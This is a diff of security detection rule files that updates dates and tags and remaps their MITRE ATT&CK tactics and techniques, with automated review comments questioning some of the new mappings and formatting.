@@ -121,42 +121,6 @@ Machine learning models analyze network traffic to identify atypical domain name [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" @@ -167,16 +131,12 @@ id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/ml/ml_rare_destination_country.toml b/rules/ml/ml_rare_destination_country.toml index 7c1f674b243..0cc3e8c8ee9 100644 --- a/rules/ml/ml_rare_destination_country.toml +++ b/rules/ml/ml_rare_destination_country.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75
@@ -77,7 +77,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "35f86980-1fb1-4dff-b311-3be941549c8d" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis
@@ -118,67 +118,25 @@ Machine learning models analyze network logs to identify traffic to uncommon des [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" -[[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" - +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" 
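Review bot: Under the Exfiltration entry (`[rule.threat.tactic]` TA0010) the rewrite keeps only T1041 and drops T1048 (Exfiltration Over Alternative Protocol), which for a rare-destination-country anomaly on generic network traffic is arguably the closer technique, since the flagged flow need not be a C2 channel. If the intent is a single technique per tactic the trim is fine; otherwise consider retaining T1048 as a second `[[rule.threat.technique]]` block under TA0010. The `"Tactic: Command and Control"` and `"Tactic: Exfiltration"` tags added in the earlier hunk match the two tactics that remain, so no orphan tag results either way.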
diff --git a/rules/ml/ml_spike_in_traffic_to_a_country.toml b/rules/ml/ml_spike_in_traffic_to_a_country.toml
index 9c9c130f549..a5cf353a99d 100644
--- a/rules/ml/ml_spike_in_traffic_to_a_country.toml
+++ b/rules/ml/ml_spike_in_traffic_to_a_country.toml
@@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75
@@ -112,58 +112,44 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "c7db5533-ca2a-41f6-a8b0-ee98abe0f573" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Tactic: Reconnaissance", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - [[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" - [[rule.threat.technique]] id = "T1595" name = "Active Scanning" 
reference = "https://attack.mitre.org/techniques/T1595/"
+[rule.threat.tactic]
+id = "TA0043"
+name = "Reconnaissance"
+reference = "https://attack.mitre.org/tactics/TA0043/"
diff --git a/rules/ml/ml_windows_anomalous_network_activity.toml b/rules/ml/ml_windows_anomalous_network_activity.toml
index 3df432d3263..e2fb8c87705 100644
--- a/rules/ml/ml_windows_anomalous_network_activity.toml
+++ b/rules/ml/ml_windows_anomalous_network_activity.toml
@@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50
@@ -79,68 +79,31 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration 
Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - diff --git a/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml b/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml index 3df45d5fb94..11b70e142fa 100644 --- a/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml +++ b/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2024/06/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -124,21 +124,3 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/ml/persistence_ml_rare_process_by_host_linux.toml b/rules/ml/persistence_ml_rare_process_by_host_linux.toml index 27b54cff337..cbda6deb409 100644 --- a/rules/ml/persistence_ml_rare_process_by_host_linux.toml +++ b/rules/ml/persistence_ml_rare_process_by_host_linux.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 
@@ -114,31 +114,35 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "46f804f5-b289-43d6-a881-9387cf594f75" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/ml/persistence_ml_rare_process_by_host_windows.toml b/rules/ml/persistence_ml_rare_process_by_host_windows.toml index bea679b8ed2..c237bb227e6 100644 --- a/rules/ml/persistence_ml_rare_process_by_host_windows.toml +++ b/rules/ml/persistence_ml_rare_process_by_host_windows.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/02/27" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -168,21 +168,3 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/ml/persistence_ml_windows_anomalous_path_activity.toml b/rules/ml/persistence_ml_windows_anomalous_path_activity.toml index ce8453a6836..3ada406bbf5 100644 --- a/rules/ml/persistence_ml_windows_anomalous_path_activity.toml +++ b/rules/ml/persistence_ml_windows_anomalous_path_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 
@@ -108,49 +108,22 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Persistence", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml b/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml index f9ada397b67..250fbaa439f 100644 --- a/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml +++ b/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml 
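Review bot: After this hunk the rule maps only to TA0002 Execution (the Persistence entry and the `"Tactic: Persistence"` tag are removed), yet the file keeps its `persistence_ml_` name prefix; if the repo ties that prefix to the rule's leading tactic, a rename to `execution_ml_…` would keep them aligned, and the same applies to persistence_ml_windows_anomalous_process_creation.toml, which also moves to Execution only. Three sibling rules (persistence_ml_linux_anomalous_process_all_hosts.toml, persistence_ml_rare_process_by_host_windows.toml, persistence_ml_windows_anomalous_process_all_hosts.toml) instead have their whole `[[rule.threat]]` block deleted rather than remapped, leaving them with no ATT&CK coverage at all. Worth confirming that is intended, since their `tags` arrays lie outside those hunks and are not changed, so any `"Tactic: …"` entry they carry would now be orphaned.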
@@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -169,33 +169,3 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/ml/persistence_ml_windows_anomalous_process_creation.toml b/rules/ml/persistence_ml_windows_anomalous_process_creation.toml index f498ba198b9..bf041396252 100644 --- a/rules/ml/persistence_ml_windows_anomalous_process_creation.toml +++ b/rules/ml/persistence_ml_windows_anomalous_process_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -161,26 +161,27 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml index c41b0d62e61..b76ecf594fd 100644 --- a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml +++ b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 
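Review bot: The new threat layout lacks the blank-line separators the rest of this commit inserts between blocks: there is no lone `+` between `+reference = "https://attack.mitre.org/techniques/T1059/"` and the following `+[[rule.threat.technique]]`, nor between `+reference = "https://attack.mitre.org/techniques/T1204/002/"` and `+[rule.threat.tactic]`, whereas persistence_ml_rare_process_by_host_linux.toml and privilege_escalation_ml_windows_rare_user_runas_event.toml add a blank before each subsequent block. The unchanged blank context lines from the old file most likely now sit between the T1204 block and its `[[rule.threat.technique.subtechnique]]`, so the entry ends up with uneven spacing. Adding a blank line before the second `[[rule.threat.technique]]` and before `[rule.threat.tactic]`, and collapsing the doubled one, would match the sibling files.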
@@ -122,26 +122,18 @@ Sudo is a command in Unix-like systems that allows permitted users to execute co - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml b/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml index 8485f372dbb..454ceb65ca1 100644 --- a/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml +++ b/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 
@@ -119,8 +119,22 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.004" +name = "Elevated Execution with Prompt" +reference = "https://attack.mitre.org/techniques/T1548/004/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml b/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml index 8c04edd604d..3b0275cb450 100644 --- a/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml +++ b/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 
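Review bot: T1548.004 Elevated Execution with Prompt, added here as a sub-technique of T1548, is scoped by ATT&CK to macOS (it covers `AuthorizationExecuteWithPrivileges` prompts), so it does not fit a Windows rule whose `integration` is `["endpoint", "windows"]`. If a sub-technique is wanted for a rare runas event, T1548.002 Bypass User Account Control is the Windows-scoped sibling: change the block to `id = "T1548.002"`, `name = "Bypass User Account Control"`, `reference = "https://attack.mitre.org/techniques/T1548/002/"`; otherwise drop the `[[rule.threat.technique.subtechnique]]` block and keep the parent only. T1078 Valid Accounts is a reasonable addition if the job keys on explicit-credential logons, which the hunk itself does not show.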
@@ -121,21 +121,3 @@ Compilers transform source code into executable programs, a crucial step in soft - Restore the system from a known good backup if malicious code execution is confirmed, ensuring that the backup is free from compromise. - Implement stricter access controls and monitoring for compiler usage, ensuring only authorized users can execute compilers. - Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.""" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1588" -name = "Obtain Capabilities" -reference = "https://attack.mitre.org/techniques/T1588/" -[[rule.threat.technique.subtechnique]] -id = "T1588.001" -name = "Malware" -reference = "https://attack.mitre.org/techniques/T1588/001/" - - - -[rule.threat.tactic] -id = "TA0042" -name = "Resource Development" -reference = "https://attack.mitre.org/tactics/TA0042/" - diff --git a/rules/network/command_and_control_accepted_default_telnet_port_connection.toml b/rules/network/command_and_control_accepted_default_telnet_port_connection.toml index e586f7519a8..284a87291a3 100644 --- a/rules/network/command_and_control_accepted_default_telnet_port_connection.toml +++ b/rules/network/command_and_control_accepted_default_telnet_port_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw", "fortinet_fortigate", "sonicwall_firewall", "suricata"] maturity = "production" -updated_date = "2026/02/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
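Review bot: The compiler-activity hunk removes the rule's only `[[rule.threat]]` entry (T1588.001 Malware under Resource Development) and adds nothing in its place, leaving `resource_development_ml_linux_anomalous_compiler_activity.toml` unmapped while the filename still advertises that tactic; the `tags` block is outside the hunk, so I cannot tell whether a `Tactic: Resource Development` tag was dropped with it. Mapping on-host compiler use to Resource Development, an adversary-infrastructure tactic, was a stretch, so removal is defensible, but a replacement such as T1027.004 Compile After Delivery under Defense Evasion (`id = "TA0005"`, `name = "Defense Evasion"`) is the conventional fit for compilers run on a victim host. If the rule is meant to stay unmapped, say so in the commit message so it is not re-added as a "missing mapping" later.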
@@ -73,18 +73,7 @@ Telnet, a protocol for remote command-line access, is often used in legacy syste risk_score = 47 rule_id = "34fde489-94b0-4500-a76f-b8a157cf9269" severity = "medium" -tags = [ - "Domain: Endpoint", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Tactic: Lateral Movement", - "Tactic: Initial Access", - "Data Source: PAN-OS", - "Data Source: Fortinet", - "Data Source: SonicWall", - "Data Source: Suricata", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: PAN-OS", "Data Source: Fortinet", "Data Source: SonicWall", "Data Source: Suricata", "Resources: Investigation Guide"] timeline_id = "300afc76-072d-4261-864d-4149714bf3f1" timeline_title = "Comprehensive Network Timeline" timestamp_override = "event.ingested" @@ -104,32 +93,25 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - 
diff --git a/rules/network/command_and_control_cobalt_strike_beacon.toml b/rules/network/command_and_control_cobalt_strike_beacon.toml index c5d168d66d3..025c8ebf198 100644 --- a/rules/network/command_and_control_cobalt_strike_beacon.toml +++ b/rules/network/command_and_control_cobalt_strike_beacon.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,24 +82,28 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" + [[rule.threat.technique.subtechnique]] id = "T1568.002" name = "Domain Generation Algorithms" reference = "https://attack.mitre.org/techniques/T1568/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml b/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml index 3e98f2fdb7b..5afb949f418 100644 --- a/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml +++ b/rules/network/command_and_control_cobalt_strike_default_teamserver_cert.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/05" integration = ["network_traffic"] maturity = "production" -updated_date = "2025/04/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
